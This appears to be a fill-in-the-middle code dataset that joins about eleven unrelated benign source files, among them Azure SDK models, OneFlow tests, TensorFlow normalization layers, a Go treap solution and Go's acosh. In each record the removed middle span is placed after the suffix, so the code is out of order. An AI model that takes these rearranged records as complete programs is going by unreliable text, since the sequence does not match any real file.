:param template_link: Gets or sets the URI referencing the template. Use
only one of Template or TemplateLink.
:type template_link: :class:`TemplateLink <Default.models.TemplateLink>`
:param parameters: Deployment parameters. Use only one of Parameters or
ParametersLink.
:type parameters: object
:param parameters_link: Gets or sets the URI referencing the parameters.
Use only one of Parameters or ParametersLink.
:type parameters_link: :class:`ParametersLink
<Default.models.ParametersLink>`
:param mode: Gets or sets the deployment mode. Possible values include:
'Incremental', 'Complete'
:type mode: str or :class:`DeploymentMode <Default.models.DeploymentMode>`
"""
_attribute_map = {
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'correlation_id': {'key': 'correlationId', 'type': 'str'},
'timestamp': {'key': 'timestamp', 'type': 'iso-8601'},
'outputs': {'key': 'outputs', 'type': 'object'},
'providers': {'key': 'providers', 'type': '[Provider]'},
'dependencies': {'key': 'dependencies', 'type': '[Dependency]'},
'template': {'key': 'template', 'type': 'object'},
'template_link': {'key': 'TemplateLink', 'type': 'TemplateLink'},
'parameters': {'key': 'parameters', 'type': 'object'},
'parameters_link': {'key': 'parametersLink', 'type': 'ParametersLink'},
'mode': {'key': 'mode', 'type': 'DeploymentMode'},
} | self.provisioning_state = provisioning_state
self.correlation_id = correlation_id
self.timestamp = timestamp
self.outputs = outputs
self.providers = providers
self.dependencies = dependencies
self.template = template
self.template_link = template_link
self.parameters = parameters
self.parameters_link = parameters_link
self.mode = mode |
def __init__(self, provisioning_state=None, correlation_id=None, timestamp=None, outputs=None, providers=None, dependencies=None, template=None, template_link=None, parameters=None, parameters_link=None, mode=None): |
green.bundle.js | !function(e){var t={};function | (n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return r.d(t,"a",t),t},r.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},r.p="",r(r.s=434)}({434:function(e,t,r){"use strict";r.r(t);r(435)},435:function(e,t,r){}}); | r |
basic.rs | // Copyright 2022 Datafuse Labs.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use anyhow::Result;
use futures::AsyncReadExt;
use futures::StreamExt; | use opendal::ObjectMode;
use opendal::Operator;
#[tokio::main]
async fn main() -> Result<()> {
let op = Operator::new(fs::Backend::build().root("/tmp").finish().await?);
let o = op.object("test_file");
// Write data info file;
let w = o.writer();
let n = w
.write_bytes("Hello, World!".to_string().into_bytes())
.await?;
assert_eq!(n, 13);
// Read data from file;
let mut r = o.reader();
let mut buf = vec![];
let n = r.read_to_end(&mut buf).await?;
assert_eq!(n, 13);
assert_eq!(String::from_utf8_lossy(&buf), "Hello, World!");
// Read range from file;
let mut r = o.range_reader(10, 1);
let mut buf = vec![];
let n = r.read_to_end(&mut buf).await?;
assert_eq!(n, 1);
assert_eq!(String::from_utf8_lossy(&buf), "l");
// Get file's Metadata
let meta = o.metadata().await?;
assert_eq!(meta.content_length(), 13);
// List current dir.
let mut obs = op.objects("").map(|o| o.expect("list object"));
let mut found = false;
while let Some(o) = obs.next().await {
let meta = o.metadata().await?;
if meta.path().contains("test_file") {
let mode = meta.mode();
assert_eq!(mode, ObjectMode::FILE);
found = true
}
}
assert!(found, "tset_file should be found in iterator");
// Delete file.
o.delete().await?;
Ok(())
} | use opendal::services::fs; |
test_binary_elementwise_ops.py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import os
import numpy as np
import tensorflow as tf
import oneflow as flow
from collections import OrderedDict
import oneflow.typing as oft
import test_global_storage
from test_util import (
GenArgDict,
GenArgList,
type_name_to_flow_type,
type_name_to_np_type,
)
gpus = tf.config.experimental.list_physical_devices("GPU")
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
def RunOneflowBinaryOp(device_type, flow_op, x, y, data_type):
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
flow_type = type_name_to_flow_type[data_type]
@flow.global_function(type="train", function_config=func_config)
def FlowJob(
x: oft.Numpy.Placeholder(x.shape, dtype=flow_type),
y: oft.Numpy.Placeholder(y.shape, dtype=flow_type),
):
with flow.scope.placement(device_type, "0:0"):
x += flow.get_variable(
name="x",
shape=x.shape,
dtype=flow_type,
initializer=flow.zeros_initializer(),
trainable=True,
)
y += flow.get_variable(
name="y",
shape=y.shape,
dtype=flow_type,
initializer=flow.zeros_initializer(),
trainable=True,
)
loss = flow_op(x, y)
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [1e-4]), momentum=0
).minimize(loss)
flow.watch_diff(x, test_global_storage.Setter("x_diff"))
flow.watch_diff(y, test_global_storage.Setter("y_diff"))
return loss
# Oneflow
out = FlowJob(x, y).get().numpy()
x_diff = test_global_storage.Get("x_diff")
y_diff = test_global_storage.Get("y_diff")
return out, x_diff, y_diff
def RunTensorFlowBinaryOp(tf_op, x, y):
# TensorFlow
with tf.GradientTape(persistent=True) as tape:
x = tf.Variable(x)
y = tf.Variable(y)
out = tf_op(x, y)
x_diff = tape.gradient(out, x)
y_diff = tape.gradient(out, y)
return out.numpy(), x_diff, y_diff
def compare_with_tensorflow(
test_case,
device_type,
flow_op,
tf_op,
x_shape,
y_shape,
data_type,
x_minval=-10,
x_maxval=10,
y_minval=-10,
y_maxval=10,
compare_grad=True,
out_rtol=1e-5,
out_atol=1e-5,
diff_rtol=1e-5,
diff_atol=1e-5,
):
test_case.assertTrue(device_type in ["gpu", "cpu"])
np_type = type_name_to_np_type[data_type]
x = np.random.uniform(low=x_minval, high=x_maxval, size=x_shape).astype(np_type)
y = np.random.uniform(low=y_minval, high=y_maxval, size=y_shape).astype(np_type)
of_out, of_x_diff, of_y_diff, = RunOneflowBinaryOp(
device_type, flow_op, x, y, data_type
)
tf_out, tf_x_diff, tf_y_diff = RunTensorFlowBinaryOp(tf_op, x, y)
test_case.assertTrue(
np.allclose(of_out, tf_out, rtol=out_rtol, atol=out_atol, equal_nan=True)
)
if compare_grad:
test_case.assertTrue(
np.allclose(
of_x_diff,
tf_x_diff.numpy(),
rtol=diff_rtol,
atol=diff_atol,
equal_nan=True,
)
)
test_case.assertTrue(
np.allclose(
of_y_diff,
tf_y_diff.numpy(),
rtol=diff_rtol,
atol=diff_atol,
equal_nan=True,
)
)
flow.clear_default_session()
@flow.unittest.skip_unless_1n1d()
class TestBinaryElementwiseOps(flow.unittest.TestCase):
def test_floordiv(test_case):
|
def test_pow(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.pow]
arg_dict["tf_op"] = [tf.math.pow]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [1]
arg_dict["x_maxval"] = [5]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [5]
arg_dict["compare_grad"] = [True]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_xdivy(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.xdivy]
arg_dict["tf_op"] = [tf.math.xdivy]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [1]
arg_dict["x_maxval"] = [100]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [10]
arg_dict["compare_grad"] = [True]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_xlogy(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.xlogy]
arg_dict["tf_op"] = [tf.math.xlogy]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [1]
arg_dict["x_maxval"] = [5]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [5]
arg_dict["compare_grad"] = [True]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_atan2(test_case):
arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.atan2]
arg_dict["tf_op"] = [tf.math.atan2]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [1]
arg_dict["x_maxval"] = [5]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [5]
arg_dict["compare_grad"] = [True]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
if __name__ == "__main__":
unittest.main()
| arg_dict = OrderedDict()
arg_dict["test_case"] = [test_case]
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["flow_op"] = [flow.math.floordiv]
arg_dict["tf_op"] = [tf.math.floordiv]
arg_dict["x_shape"] = [(5, 5,)]
arg_dict["y_shape"] = [(5, 5,)]
arg_dict["data_type"] = ["float32", "double"]
arg_dict["x_minval"] = [-10]
arg_dict["x_maxval"] = [10]
arg_dict["y_minval"] = [1]
arg_dict["y_maxval"] = [10]
arg_dict["compare_grad"] = [False]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg) |
keeper_test.go | package keeper_test
import (
"testing"
"github.com/stretchr/testify/require"
"github.com/stretchr/testify/suite"
tmproto "github.com/tendermint/tendermint/proto/tendermint/types"
"github.com/cosmos/cosmos-sdk/baseapp"
"github.com/cosmos/cosmos-sdk/simapp"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/cosmos/cosmos-sdk/x/staking/keeper"
"github.com/cosmos/cosmos-sdk/x/staking/types"
)
type KeeperTestSuite struct {
suite.Suite
app *simapp.SimApp
ctx sdk.Context
addrs []sdk.AccAddress
vals []types.Validator
queryClient types.QueryClient
}
func (suite *KeeperTestSuite) SetupTest() {
app := simapp.Setup(suite.T(), false)
ctx := app.BaseApp.NewContext(false, tmproto.Header{})
querier := keeper.Querier{Keeper: app.StakingKeeper}
queryHelper := baseapp.NewQueryServerTestHelper(ctx, app.InterfaceRegistry())
types.RegisterQueryServer(queryHelper, querier)
queryClient := types.NewQueryClient(queryHelper)
addrs, _, validators := createValidators(suite.T(), ctx, app, []int64{9, 8, 7})
header := tmproto.Header{
ChainID: "HelloChain",
Height: 5,
}
// sort a copy of the validators, so that original validators does not
// have its order changed
sortedVals := make([]types.Validator, len(validators))
copy(sortedVals, validators)
hi := types.NewHistoricalInfo(header, sortedVals, app.StakingKeeper.PowerReduction(ctx))
app.StakingKeeper.SetHistoricalInfo(ctx, 5, &hi)
suite.app, suite.ctx, suite.queryClient, suite.addrs, suite.vals = app, ctx, queryClient, addrs, validators
}
func | (t *testing.T) {
app := simapp.Setup(t, false)
ctx := app.BaseApp.NewContext(false, tmproto.Header{})
expParams := types.DefaultParams()
//check that the empty keeper loads the default
resParams := app.StakingKeeper.GetParams(ctx)
require.True(t, expParams.Equal(resParams))
//modify a params, save, and retrieve
expParams.MaxValidators = 777
app.StakingKeeper.SetParams(ctx, expParams)
resParams = app.StakingKeeper.GetParams(ctx)
require.True(t, expParams.Equal(resParams))
}
func TestKeeperTestSuite(t *testing.T) {
suite.Run(t, new(KeeperTestSuite))
}
| TestParams |
train.py | # -*- coding: utf-8 -*-
"""
Main training file for the CRF.
This file trains a CRF model and saves it under the filename provided via an 'identifier' command
line argument.
Usage example:
python train.py --identifier="my_experiment"
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import random
import pycrfsuite
from model.datasets import load_windows, load_articles, generate_examples
import model.features as features
# All capitalized constants come from this file
import config as cfg
random.seed(42)
def main():
"""This function handles the command line arguments and then calls the train() method."""
parser = argparse.ArgumentParser()
parser.add_argument("--identifier", required=True,
help="A short name/identifier for your experiment, e.g. 'ex42b'.")
args = parser.parse_args()
train(args)
def train(args):
"""Main training method.
Does the following:
1. Create a new pycrfsuite trainer object. We will have to add feature chains and label
chains to that object and then train on them.
2. Creates the feature (generators). A feature generator might e.g. take in a window
of N tokens and then return ["upper=1"] for each token that starts with an uppercase
letter and ["upper=0"] for each token that starts with a lowercase letter. (Lists,
because a token can be converted into multiple features by a single feature generator,
e.g. the case for LDA as a token may be part of multiple topics.)
3. Loads windows from the corpus. Each window has a fixed (maximum) size in tokens. | One list at the top level representing each token, then another list for the feature
values. E.g.
[["w2v=123", "bc=742", "upper=0"], ["w2v=4", "bc=12", "upper=1", "lda4=1"]]
for two tokens.
5. Add feature chains and label chains to the trainer.
6. Train. This may take several hours for 20k windows.
Args:
args: Command line arguments as parsed by argparse.ArgumentParser.
"""
trainer = pycrfsuite.Trainer(verbose=True)
# Create/Initialize the feature generators
# this may take a few minutes
print("Creating features...")
feature_generators = features.create_features()
# Initialize the window generator
# each window has a fixed maximum size of tokens
print("Loading windows...")
windows = load_windows(load_articles(cfg.ARTICLES_FILEPATH), cfg.WINDOW_SIZE,
feature_generators, only_labeled_windows=True)
# Add chains of features (each list of lists of strings)
# and chains of labels (each list of strings)
# to the trainer.
# This may take a long while, especially because of the lengthy POS tagging.
# POS tags and LDA results are cached, so the second run through this part will be significantly
# faster.
print("Adding example windows (up to max %d)..." % (cfg.COUNT_WINDOWS_TRAIN))
examples = generate_examples(windows, nb_append=cfg.COUNT_WINDOWS_TRAIN,
nb_skip=cfg.COUNT_WINDOWS_TEST, verbose=True)
for feature_values_lists, labels in examples:
trainer.append(feature_values_lists, labels)
# Train the model
# this may take several hours
print("Training...")
if cfg.MAX_ITERATIONS is not None and cfg.MAX_ITERATIONS > 0:
# set the maximum number of iterations of defined in the config file
# the optimizer stops automatically after some iterations if this is not set
trainer.set_params({'max_iterations': cfg.MAX_ITERATIONS})
trainer.train(args.identifier)
# ----------------
if __name__ == "__main__":
main() | We only load windows that contain at least one label (named entity), so that we don't
waste too much time on windows without any label.
4. Generate features for each chain of tokens (window). That's basically described in (2.).
Each chain of tokens from a window will be converted to a list of lists. |
normalizations.py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Orginal implementation from keras_contrib/layer/normalization
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import tensorflow as tf
@tf.keras.utils.register_keras_serializable(package='Addons')
class GroupNormalization(tf.keras.layers.Layer):
"""Group normalization layer.
Group Normalization divides the channels into groups and computes
within each group the mean and variance for normalization.
Empirically, its accuracy is more stable than batch norm in a wide
range of small batch sizes, if learning rate is adjusted linearly
with batch sizes.
Relation to Layer Normalization:
If the number of groups is set to 1, then this operation becomes identical
to Layer Normalization.
Relation to Instance Normalization:
If the number of groups is set to the
input dimension (number of groups is equal
to number of channels), then this operation becomes
identical to Instance Normalization.
Arguments
groups: Integer, the number of groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
axis: Integer, the axis that should be normalized.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor.
If False, `beta` is ignored.
scale: If True, multiply by `gamma`.
If False, `gamma` is not used.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
Input shape
Arbitrary. Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
Output shape
Same shape as input.
References
- [Group Normalization](https://arxiv.org/abs/1803.08494)
"""
def __init__(self,
groups=2,
axis=-1,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
**kwargs):
super(GroupNormalization, self).__init__(**kwargs)
self.supports_masking = True
self.groups = groups
self.axis = axis
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = tf.keras.initializers.get(beta_initializer)
self.gamma_initializer = tf.keras.initializers.get(gamma_initializer)
self.beta_regularizer = tf.keras.regularizers.get(beta_regularizer)
self.gamma_regularizer = tf.keras.regularizers.get(gamma_regularizer)
self.beta_constraint = tf.keras.constraints.get(beta_constraint)
self.gamma_constraint = tf.keras.constraints.get(gamma_constraint)
self._check_axis()
def build(self, input_shape):
self._check_if_input_shape_is_none(input_shape)
self._set_number_of_groups_for_instance_norm(input_shape)
self._check_size_of_dimensions(input_shape)
self._create_input_spec(input_shape)
self._add_gamma_weight(input_shape)
self._add_beta_weight(input_shape)
self.built = True
super(GroupNormalization, self).build(input_shape)
def call(self, inputs):
input_shape = tf.keras.backend.int_shape(inputs)
tensor_input_shape = tf.shape(inputs)
reshaped_inputs, group_shape = self._reshape_into_groups(
inputs, input_shape, tensor_input_shape)
normalized_inputs = self._apply_normalization(reshaped_inputs,
input_shape)
outputs = tf.reshape(normalized_inputs, tensor_input_shape)
return outputs
def get_config(self):
config = {
'groups':
self.groups,
'axis':
self.axis,
'epsilon':
self.epsilon,
'center':
self.center,
'scale':
self.scale,
'beta_initializer':
tf.keras.initializers.serialize(self.beta_initializer),
'gamma_initializer':
tf.keras.initializers.serialize(self.gamma_initializer),
'beta_regularizer':
tf.keras.regularizers.serialize(self.beta_regularizer),
'gamma_regularizer':
tf.keras.regularizers.serialize(self.gamma_regularizer),
'beta_constraint':
tf.keras.constraints.serialize(self.beta_constraint),
'gamma_constraint':
tf.keras.constraints.serialize(self.gamma_constraint)
}
base_config = super(GroupNormalization, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
return input_shape
def _reshape_into_groups(self, inputs, input_shape, tensor_input_shape):
group_shape = [tensor_input_shape[i] for i in range(len(input_shape))]
group_shape[self.axis] = input_shape[self.axis] // self.groups
group_shape.insert(1, self.groups)
group_shape = tf.stack(group_shape)
reshaped_inputs = tf.reshape(inputs, group_shape)
return reshaped_inputs, group_shape
def _apply_normalization(self, reshaped_inputs, input_shape):
group_shape = tf.keras.backend.int_shape(reshaped_inputs)
group_reduction_axes = list(range(len(group_shape)))
# Remember the ordering of the tensor is [batch, group , steps]. Jump
# the first 2 to calculate the variance and the mean
mean, variance = tf.nn.moments(
reshaped_inputs, group_reduction_axes[2:], keepdims=True)
gamma, beta = self._get_reshaped_weights(input_shape)
normalized_inputs = tf.nn.batch_normalization(
reshaped_inputs,
mean=mean,
variance=variance,
scale=gamma,
offset=beta,
variance_epsilon=self.epsilon)
return normalized_inputs
def _get_reshaped_weights(self, input_shape):
broadcast_shape = self._create_broadcast_shape(input_shape)
gamma = None
beta = None
if self.scale:
gamma = tf.reshape(self.gamma, broadcast_shape)
if self.center:
beta = tf.reshape(self.beta, broadcast_shape)
return gamma, beta
def _check_if_input_shape_is_none(self, input_shape):
dim = input_shape[self.axis]
if dim is None:
raise ValueError('Axis ' + str(self.axis) + ' of '
'input tensor should have a defined dimension '
'but the layer received an input with shape ' +
str(input_shape) + '.')
def _set_number_of_groups_for_instance_norm(self, input_shape):
dim = input_shape[self.axis]
if self.groups == -1:
self.groups = dim
def _check_size_of_dimensions(self, input_shape):
dim = input_shape[self.axis]
if dim < self.groups:
|
if dim % self.groups != 0:
raise ValueError(
'Number of groups (' + str(self.groups) + ') must be a '
'multiple of the number of channels (' + str(dim) + ').')
def _check_axis(self):
if self.axis == 0:
raise ValueError(
"You are trying to normalize your batch axis. Do you want to "
"use tf.layer.batch_normalization instead")
def _create_input_spec(self, input_shape):
dim = input_shape[self.axis]
self.input_spec = tf.keras.layers.InputSpec(
ndim=len(input_shape), axes={self.axis: dim})
def _add_gamma_weight(self, input_shape):
dim = input_shape[self.axis]
shape = (dim,)
if self.scale:
self.gamma = self.add_weight(
shape=shape,
name='gamma',
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint)
else:
self.gamma = None
def _add_beta_weight(self, input_shape):
dim = input_shape[self.axis]
shape = (dim,)
if self.center:
self.beta = self.add_weight(
shape=shape,
name='beta',
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint)
else:
self.beta = None
def _create_broadcast_shape(self, input_shape):
broadcast_shape = [1] * len(input_shape)
broadcast_shape[self.axis] = input_shape[self.axis] // self.groups
broadcast_shape.insert(1, self.groups)
return broadcast_shape
@tf.keras.utils.register_keras_serializable(package='Addons')
class InstanceNormalization(GroupNormalization):
"""Instance normalization layer.
Instance Normalization is an specific case of ```GroupNormalization```since
it normalizes all features of one channel. The Groupsize is equal to the
channel size. Empirically, its accuracy is more stable than batch norm in a
wide range of small batch sizes, if learning rate is adjusted linearly
with batch sizes.
Arguments
axis: Integer, the axis that should be normalized.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor.
If False, `beta` is ignored.
scale: If True, multiply by `gamma`.
If False, `gamma` is not used.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
Input shape
Arbitrary. Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
Output shape
Same shape as input.
References
- [Instance Normalization: The Missing Ingredient for Fast Stylization]
(https://arxiv.org/abs/1607.08022)
"""
def __init__(self, **kwargs):
if "groups" in kwargs:
logging.warning("The given value for groups will be overwritten.")
kwargs["groups"] = -1
super(InstanceNormalization, self).__init__(**kwargs)
| raise ValueError(
'Number of groups (' + str(self.groups) + ') cannot be '
'more than the number of channels (' + str(dim) + ').') |
960F.go | package main
import (
"bufio"
. "fmt"
"io"
"time"
)
// github.com/EndlessCheng/codeforces-go
type node60 struct {
lr [2]*node60
priority uint
key, val int
}
func (o *node60) cmp(b int) int {
switch {
case b < o.key:
return 0
case b > o.key:
return 1
default:
return -1
}
}
func (o *node60) rotate(d int) *node60 {
x := o.lr[d^1]
o.lr[d^1] = x.lr[d]
x.lr[d] = o
return x
}
type treap60 struct {
rd uint
root *node60
}
func (t *treap60) fastRand() uint {
t.rd ^= t.rd << 13
t.rd ^= t.rd >> 17
t.rd ^= t.rd << 5
return t.rd
}
func (t *treap60) _put(o *node60, key, val int) *node60 {
if o == nil |
if d := o.cmp(key); d >= 0 {
o.lr[d] = t._put(o.lr[d], key, val)
if o.lr[d].priority > o.priority {
o = o.rotate(d ^ 1)
}
}
return o
}
func (t *treap60) put(key, val int) { t.root = t._put(t.root, key, val) }
func (t *treap60) _delete(o *node60, key int) *node60 {
if o == nil {
return nil
}
if d := o.cmp(key); d >= 0 {
o.lr[d] = t._delete(o.lr[d], key)
} else {
if o.lr[1] == nil {
return o.lr[0]
}
if o.lr[0] == nil {
return o.lr[1]
}
d = 0
if o.lr[0].priority > o.lr[1].priority {
d = 1
}
o = o.rotate(d)
o.lr[d] = t._delete(o.lr[d], key)
}
return o
}
func (t *treap60) delete(key int) { t.root = t._delete(t.root, key) }
func (t *treap60) lowerBound(key int) (lb *node60) {
for o := t.root; o != nil; {
switch c := o.cmp(key); {
case c == 0:
lb = o
o = o.lr[0]
case c > 0:
o = o.lr[1]
default:
return o
}
}
return
}
func (t *treap60) prev(key int) (prev *node60) {
for o := t.root; o != nil; {
if o.cmp(key) <= 0 {
o = o.lr[0]
} else {
prev = o
o = o.lr[1]
}
}
return
}
func CF960F(_r io.Reader, out io.Writer) {
in := bufio.NewReader(_r)
var n, m, v, w, wt, ans int
Fscan(in, &n, &m)
ts := make([]*treap60, n)
rd := uint(time.Now().UnixNano())/2 + 1
for i := range ts {
ts[i] = &treap60{rd: rd}
}
for ; m > 0; m-- {
Fscan(in, &v, &w, &wt)
v--
w--
res := 1
if o := ts[v].prev(wt + 1); o != nil {
res = o.val + 1
}
if res > ans {
ans = res
}
for {
o := ts[w].lowerBound(wt)
if o == nil || o.val > res {
break
}
ts[w].delete(o.key)
}
if o := ts[w].lowerBound(wt); o != nil && o.key == wt {
continue
}
if o := ts[w].prev(wt); o != nil && o.val >= res {
continue
}
ts[w].put(wt, res)
}
Fprint(out, ans)
}
//func main() { CF960F(os.Stdin, os.Stdout) }
| {
return &node60{priority: t.fastRand(), key: key, val: val}
} |
acosh.go | // Copyright 2010 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package math
// The original C code, the long comment, and the constants
// below are from FreeBSD's /usr/src/lib/msun/src/e_acosh.c
// and came with this notice. The go code is a simplified
// version of the original C.
//
// ====================================================
// Copyright (C) 1993 by Sun Microsystems, Inc. All rights reserved.
//
// Developed at SunPro, a Sun Microsystems, Inc. business.
// Permission to use, copy, modify, and distribute this
// software is freely granted, provided that this notice
// is preserved.
// ====================================================
//
//
// __ieee754_acosh(x)
// Method :
// Based on
// acosh(x) = log [ x + sqrt(x*x-1) ]
// we have
// acosh(x) := log(x)+ln2, if x is large; else
// acosh(x) := log(2x-1/(sqrt(x*x-1)+x)) if x>2; else
// acosh(x) := log1p(t+sqrt(2.0*t+t*t)); where t=x-1.
//
// Special cases:
// acosh(x) is NaN with signal if x<1.
// acosh(NaN) is NaN without signal.
//
// Acosh returns the inverse hyperbolic cosine of x.
//
// Special cases are:
// Acosh(+Inf) = +Inf
// Acosh(x) = NaN if x < 1
// Acosh(NaN) = NaN
func Acosh(x float64) float64 |
func acosh(x float64) float64 {
const Large = 1 << 28 // 2**28
// first case is special case
switch {
case x < 1 || IsNaN(x):
return NaN()
case x == 1:
return 0
case x >= Large:
return Log(x) + Ln2 // x > 2**28
case x > 2:
return Log(2*x - 1/(x+Sqrt(x*x-1))) // 2**28 > x > 2
}
t := x - 1
return Log1p(t + Sqrt(2*t+t*t)) // 2 >= x > 1
}
| {
if haveArchAcosh {
return archAcosh(x)
}
return acosh(x)
} |
precharge_array.py | import design
import debug |
class precharge_array(design.design):
"""
Dynamically generated precharge array of all bitlines. Cols is number
of bit line columns, height is the height of the bit-cell array.
"""
def __init__(self, columns, size=1):
design.design.__init__(self, "precharge_array")
debug.info(1, "Creating {0}".format(self.name))
self.columns = columns
self.pc_cell = precharge(name="precharge", size=size)
self.add_mod(self.pc_cell)
self.width = self.columns * self.pc_cell.width
self.height = self.pc_cell.height
self.add_pins()
self.create_layout()
self.DRC_LVS()
def add_pins(self):
"""Adds pins for spice file"""
for i in range(self.columns):
self.add_pin("bl[{0}]".format(i))
self.add_pin("br[{0}]".format(i))
self.add_pin("en")
self.add_pin("vdd")
def create_layout(self):
self.add_insts()
self.add_layout_pin(text="vdd",
layer="metal1",
offset=self.pc_cell.get_pin("vdd").ll(),
width=self.width,
height=drc["minwidth_metal1"])
self.add_layout_pin(text="en",
layer="metal1",
offset=self.pc_cell.get_pin("en").ll(),
width=self.width,
height=drc["minwidth_metal1"])
def add_insts(self):
"""Creates a precharge array by horizontally tiling the precharge cell"""
for i in range(self.columns):
name = "pre_column_{0}".format(i)
offset = vector(self.pc_cell.width * i, 0)
inst=self.add_inst(name=name,
mod=self.pc_cell,
offset=offset)
bl_pin = inst.get_pin("bl")
self.add_layout_pin(text="bl[{0}]".format(i),
layer="metal2",
offset=bl_pin.ll(),
width=drc["minwidth_metal2"],
height=bl_pin.height())
br_pin = inst.get_pin("br")
self.add_layout_pin(text="br[{0}]".format(i),
layer="metal2",
offset=br_pin.ll(),
width=drc["minwidth_metal2"],
height=bl_pin.height())
self.connect_inst(["bl[{0}]".format(i), "br[{0}]".format(i),
"en", "vdd"]) | from tech import drc
from vector import vector
from precharge import precharge |
lib.rs | //! `json_env_logger` is an extension of [`env_logger`](https://crates.io/crates/env_logger) crate providing JSON formatted logs.
//!
